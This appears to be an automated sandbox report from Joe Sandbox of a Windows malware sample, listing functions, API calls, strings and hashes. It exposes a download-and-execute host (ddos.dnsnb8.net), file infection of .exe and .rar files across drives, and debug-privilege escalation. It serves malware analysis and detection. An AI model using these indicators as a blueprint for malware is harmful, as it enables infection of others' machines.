Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user~1\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-4120842960
Opcode ID: 9d31dbe166e3f8763fd0fad482d4bb9a2accf8addbdc12505070d4cb28b4f788
Instruction ID: f9505ba1d06110c132d7207e696c82c1829a9b5ef3e68744f5982ee70cff0e22
Opcode Fuzzy Hash: 9d31dbe166e3f8763fd0fad482d4bb9a2accf8addbdc12505070d4cb28b4f788
Instruction Fuzzy Hash: AD210C7590034CFADB209BA0DC45ABBBBB9AB15315F16C056E605E2150DB759B84CF70

Function 00DF1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe), ref: 00DF1729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00DF174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00DF177C
__aulldiv.LIBCMT ref: 00DF1796
__aulldiv.LIBCMT ref: 00DF17A8

Strings

Time, xrefs: 00DF173D, 00DF1766
SOFTWARE\GTplus, xrefs: 00DF1742, 00DF176B
C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, xrefs: 00DF1722

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-2532596453
Opcode ID: c9fb3dd3cb1b6c34ddad45a6d97d4bf8aabbb948ae1a32910b08ddbd3b304604
Instruction ID: 9b9cee47264d5a203b16666cd50d4e88cde87a9167cc15004ddd5c8657ae3259
Opcode Fuzzy Hash: c9fb3dd3cb1b6c34ddad45a6d97d4bf8aabbb948ae1a32910b08ddbd3b304604
Instruction Fuzzy Hash: 34112175A0030DFBDB11AAA4C885FBF7BBCEB44B14F12C115FB05A6140D6719A48CB70

Function 00DF6076 Relevance: 11.1, APIs: 7, Instructions: 616
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00DF60BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00DF60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00DF6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00DF61A5

Memory Dump Source

Source File: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: d9a06ce9d0bbae6b3cd98f75b5cfb14e88b1875533c0d308f299a3c739a26dd6
Instruction ID: 84e7f44f2537bf3bdf5cac10a82e43cbd38fb1a063dc686b303d09f7212917cb
Opcode Fuzzy Hash: d9a06ce9d0bbae6b3cd98f75b5cfb14e88b1875533c0d308f299a3c739a26dd6
Instruction Fuzzy Hash: 891246725087899FDB328F64CC45BFA3BB0EF02300F1A855DDA898BA92D774E900C765

Function 00DF2B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00DF2BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00DF2BB4
GetDriveTypeA.KERNEL32(?), ref: 00DF2BD3
CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00DF2BEE
lstrlen.KERNEL32(?), ref: 00DF2BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00DF2C16
CreateThread.KERNEL32(00000000,00000000,00DF2845,00000000,00000000,00000000), ref: 00DF2C3A

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 87893c12f8142fa42c7d62a329afc21f1e8d150ad3d6e1b9a297319632783631
Instruction ID: 4e693cd5ea8b4bfc19b26d964d7d68986bab37216ec90211763b67ee055d3330
Opcode Fuzzy Hash: 87893c12f8142fa42c7d62a329afc21f1e8d150ad3d6e1b9a297319632783631
Instruction Fuzzy Hash: 6B21A5B184029CAFE7209F64AC84DBF7B6DFB05345B1A8126FE52D2261D7248E06CB71

Function 00DF1E6E Relevance: 30.4, APIs: 20, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,00DF32B0,00000164,00DF2986,?), ref: 00DF1EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00DF1ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00DF1EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00DF1F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00DF1F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00DF201E
memset.MSVCRT ref: 00DF20D8
memset.MSVCRT ref: 00DF20EA
memcpy.MSVCRT ref: 00DF222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF2238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF22C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF22CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF22DD
WriteFile.KERNEL32(000000FF,00DF4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF22F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00DF2322
UnmapViewOfFile.KERNEL32(?,?,00DF32B0,00000164,00DF2986,?), ref: 00DF2340
FindCloseChangeNotification.KERNEL32(?,?,00DF32B0,00000164,00DF2986,?), ref: 00DF234E
FindCloseChangeNotification.KERNEL32(000000FF,?,00DF32B0,00000164,00DF2986,?), ref: 00DF2359

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
String ID:
API String ID: 3349749541-0
Opcode ID: 63e316a84e4613c205ad114615d348b29e4ba80a0fa32c098c2993c9489fa815
Instruction ID: 62262850e467ad292a814a870c8f2aacac297cea61d827f8c25e526cfab2978a
Opcode Fuzzy Hash: 63e316a84e4613c205ad114615d348b29e4ba80a0fa32c098c2993c9489fa815
Instruction Fuzzy Hash: 69F12975900209EFCB24DFA4DC85ABDBBB5FF08314F11852AE619A7661D730AE81CF64

Function 00DF1973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(00DF4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe), ref: 00DF1992
CreateFileA.KERNEL32(00DF4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00DF19BA
Sleep.KERNEL32(00000064), ref: 00DF19C6
wsprintfA.USER32 ref: 00DF19EC
CopyFileA.KERNEL32(00DF4E5C,?,00000000), ref: 00DF1A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF1A1E
GetFileSize.KERNEL32(00DF4E5C,00000000), ref: 00DF1A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00DF1A46
ReadFile.KERNEL32(00DF4E5C,00DF4E60,00000000,?,00000000), ref: 00DF1A65
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00DF1A90
DeleteFileA.KERNEL32(?), ref: 00DF1AA7
VirtualFree.KERNEL32(00DF4E60,00000000,00008000), ref: 00DF1AC1

Strings

2, xrefs: 00DF19CF
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00DF19DB
%s%.8X.data, xrefs: 00DF19E6
C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, xrefs: 00DF197C

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$2$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe
API String ID: 2523042076-1974942556
Opcode ID: 3d22d4901e96d1e3fb9591d9b044c5ac4d63d8b9896b11dca3c5954bd5340c7c
Instruction ID: c27856d28f58fc4670ca1d92ba992b41c526423562176930d191b1e5227343fa
Opcode Fuzzy Hash: 3d22d4901e96d1e3fb9591d9b044c5ac4d63d8b9896b11dca3c5954bd5340c7c
Instruction Fuzzy Hash: D7516C7590121DEFCB209F98CC84ABEBBB8EB04354F16856AF615E6290C7309E55CBB0

Function 00DF28B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00DF28D3
wsprintfA.USER32 ref: 00DF28F7
memset.MSVCRT ref: 00DF2925
wsprintfA.USER32 ref: 00DF2940

Part of subcall function 00DF29E2: memset.MSVCRT ref: 00DF2A02
Part of subcall function 00DF29E2: wsprintfA.USER32 ref: 00DF2A1A
Part of subcall function 00DF29E2: memset.MSVCRT ref: 00DF2A44
Part of subcall function 00DF29E2: lstrlen.KERNEL32(?), ref: 00DF2A54
Part of subcall function 00DF29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00DF2A6C
Part of subcall function 00DF29E2: strrchr.MSVCRT ref: 00DF2A7C
Part of subcall function 00DF29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00DF2A9F
Part of subcall function 00DF29E2: lstrlen.KERNEL32(Documents and Settings), ref: 00DF2AAE
Part of subcall function 00DF29E2: memset.MSVCRT ref: 00DF2AC6
Part of subcall function 00DF29E2: memset.MSVCRT ref: 00DF2ADA
Part of subcall function 00DF29E2: FindFirstFileA.KERNEL32(?,?), ref: 00DF2AEF
Part of subcall function 00DF29E2: memset.MSVCRT ref: 00DF2B13

strrchr.MSVCRT ref: 00DF2959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00DF2974

Strings

%s\, xrefs: 00DF293A
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00DF29B3
%s%s, xrefs: 00DF28F1
rar, xrefs: 00DF2988
exe, xrefs: 00DF296D

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user~1\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-4092107658
Opcode ID: 3161fe496b38d62cede530f542e22a7add6dcaab7d6e08212ab90cd204f83ab5
Instruction ID: b753eb4b5fcd9731f26f2f528c3197c378dc0f769c954dde303a0ad992cc76dc
Opcode Fuzzy Hash: 3161fe496b38d62cede530f542e22a7add6dcaab7d6e08212ab90cd204f83ab5
Instruction Fuzzy Hash: C231927198030C6BDB209BA4DC95FFA776C9B10314F078452F685E7581EAF4DAC48E70

Function 00DF1638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\,?,00000005,00000000), ref: 00DF164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00DF165B
GetModuleFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe,00000104), ref: 00DF166E
CreateThread.KERNEL32(00000000,00000000,00DF1099,00000000,00000000,00000000), ref: 00DF16AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00DF16BD

Part of subcall function 00DF139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe), ref: 00DF13BC
Part of subcall function 00DF139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00DF13DA
Part of subcall function 00DF139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00DF1448

lstrcpy.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe), ref: 00DF16E5

Strings

Documents and Settings, xrefs: 00DF1696
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00DF1644
C:\Windows\system32, xrefs: 00DF1656
C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, xrefs: 00DF1662, 00DF1667, 00DF16DD

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-3232464442
Opcode ID: 7a8029c2d3e2b053ef55fc74baf4bc25a04f960d0aa21e4e7cd90c02830857a4
Instruction ID: c5afea96d56dbaf4d191e371b8476917970949e0ad68c6fa994f38852757e374
Opcode Fuzzy Hash: 7a8029c2d3e2b053ef55fc74baf4bc25a04f960d0aa21e4e7cd90c02830857a4
Instruction Fuzzy Hash: CA118E75501318FBCF206BA5AD49EBB3E6DEB45365F07C012F309D52A0CA718984CBB1

Function 00DF1000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00DF10E8,?), ref: 00DF1018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A38400,?,http://%s:%d/%s/%s,00DF10E8,?), ref: 00DF1029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00DF1038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00DF10E8,?), ref: 00DF104B
UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00DF10E8,?), ref: 00DF1075
CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00DF10E8,?), ref: 00DF108B
CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00DF10E8,?), ref: 00DF108E

Strings

ddos.dnsnb8.net, xrefs: 00DF1026
http://%s:%d/%s/%s, xrefs: 00DF1000

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3273462101
Opcode ID: 1617022a49a2ac9eddb0c6e501eb02d3bd8546d8342f4802784630cd5e01ed89
Instruction ID: 55fee542f419d8356c16e76bf396a0a59d6d705b46b1c25d9a7335cfa6a45dcb
Opcode Fuzzy Hash: 1617022a49a2ac9eddb0c6e501eb02d3bd8546d8342f4802784630cd5e01ed89
Instruction Fuzzy Hash: BB011E7550035DBFE6306F609C88E3BBAACDB447A9F06862AB645E2190DA715E448A70

Function 00DF2C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00DF2C57

Part of subcall function 00DF1973: PathFileExistsA.SHLWAPI(00DF4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe), ref: 00DF1992
Part of subcall function 00DF1973: CreateFileA.KERNEL32(00DF4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00DF19BA
Part of subcall function 00DF1973: Sleep.KERNEL32(00000064), ref: 00DF19C6
Part of subcall function 00DF1973: wsprintfA.USER32 ref: 00DF19EC
Part of subcall function 00DF1973: CopyFileA.KERNEL32(00DF4E5C,?,00000000), ref: 00DF1A00
Part of subcall function 00DF1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF1A1E
Part of subcall function 00DF1973: GetFileSize.KERNEL32(00DF4E5C,00000000), ref: 00DF1A2C
Part of subcall function 00DF1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00DF1A46
Part of subcall function 00DF1973: ReadFile.KERNEL32(00DF4E5C,00DF4E60,00000000,?,00000000), ref: 00DF1A65

CreateThread.KERNEL32(00000000,00000000,00DF2B8C,00000000,00000000,00000000), ref: 00DF2C99
WaitForMultipleObjects.KERNEL32(00000001,00DF16BA,00000001,000000FF,?,00DF16BA,00000000), ref: 00DF2CAC
VirtualFree.KERNEL32(007E0000,00000000,00008000,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe,00DF4E5C,00DF4E60,?,00DF16BA,00000000), ref: 00DF2CC2

Strings

C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, xrefs: 00DF2C69

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe
API String ID: 2042498389-121788227
Opcode ID: 559445e4b8c2620448a27545547e4a18e8d7cf958212ede8b77b523450764102
Instruction ID: aa8a662f657be04368ae4a924dd2d6d315acda27098c18c1ac611bac5c81e5d4
Opcode Fuzzy Hash: 559445e4b8c2620448a27545547e4a18e8d7cf958212ede8b77b523450764102
Instruction Fuzzy Hash: 33018F726412287ED710ABA5EC0AEBF7E6CEF41B60F16C115BB15D62C1DAA09A04C7F0

Function 00DF14E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00DF1504
VirtualQuery.KERNEL32(00DF14E1,?,0000001C), ref: 00DF1525
ExitProcess.KERNEL32 ref: 00DF157A

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 972af4141e338d2baf2734ef1dc1777ceea9112f4a64d816ce6ec6adadc537c0
Instruction ID: 8f39df088d56851f8c308432f1e8d317356fd44ce08023869f0d864bae7e1d78
Opcode Fuzzy Hash: 972af4141e338d2baf2734ef1dc1777ceea9112f4a64d816ce6ec6adadc537c0
Instruction Fuzzy Hash: EF117C79900318EFCB20DFA5AC94A7E77BCEB84750B1AC02BF602D2350D6308941DB70

Function 00DF1915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00DF1933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00DF1947

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: ed92504ecc87aa036ee996ce000da083a30a978b6214b14052dee1d0d574bd98
Instruction ID: 4d45b15357fb8ea7236c749a8b4bfb9a990b7f00ede29f63e89ce3fc98c84d2a
Opcode Fuzzy Hash: ed92504ecc87aa036ee996ce000da083a30a978b6214b14052dee1d0d574bd98
Instruction Fuzzy Hash: 7DF0313620020DEBDB209E26DC04AB777ACAB50361F06C526F666D5190E770D645DEB0

Non-executed Functions

Function 00DF119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe,?,?,?,?,?,?,00DF13EF), ref: 00DF11AB
OpenProcessToken.ADVAPI32(00000000,00000028,00DF13EF,?,?,?,?,?,?,00DF13EF), ref: 00DF11BB
AdjustTokenPrivileges.ADVAPI32(00DF13EF,00000000,?,00000010,00000000,00000000), ref: 00DF11EB
CloseHandle.KERNEL32(00DF13EF), ref: 00DF11FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00DF13EF), ref: 00DF1203

Strings

C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, xrefs: 00DF11A5

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe
API String ID: 75692138-121788227
Opcode ID: 5ed9602c1a535bfa254c69620f341372af40d737d9d154dcb4fac4c2734540fa
Instruction ID: bf47ffc6657594e442624e661c21a3bcbb62bc624719cc461525718023cf776b
Opcode Fuzzy Hash: 5ed9602c1a535bfa254c69620f341372af40d737d9d154dcb4fac4c2734540fa
Instruction Fuzzy Hash: 0F01D2B5900309EFDB00DFE4C989AAEBBB8FB04305F11846AE606E2250DB719E44DB60

Function 00DF139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe), ref: 00DF13BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00DF13DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00DF1448

